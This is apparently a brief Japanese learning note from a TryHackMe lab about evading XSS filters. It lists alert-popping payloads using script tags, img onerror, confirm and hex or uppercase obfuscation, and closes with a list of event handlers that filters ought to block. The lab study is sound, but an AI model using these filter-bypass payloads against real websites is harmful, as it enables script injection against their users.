今回はTryHackMeのお話

今回、XSSについて学んでいました。

XSSを実施するうえでの、フィルタのバイパス方法について

Helloの文字をポップアップで出すことがお題

①基本形

<script>alert("Hello")</script>

②scriptという文字列がフィルタされる場合

imgタグを利用

<img src=x onerror=alert("Hello")>

③alertという文字列がフィルタされる場合

confirm, promptを利用

<img src=x onerror=confirm("Hello")>

④その他

文字列のUnicode変換

Hello→\x48\x65\x6c\x6c\x6f

文字列の大文字化

<img src=x ONERROR=confirm("\x48\x65\x6c\x6c\x6f")>

フィルタされるべき値

onerror
onsubmit
onload
onmouseover
onfocus
onmouseout
onkeypress
onchange

面白い！

以上。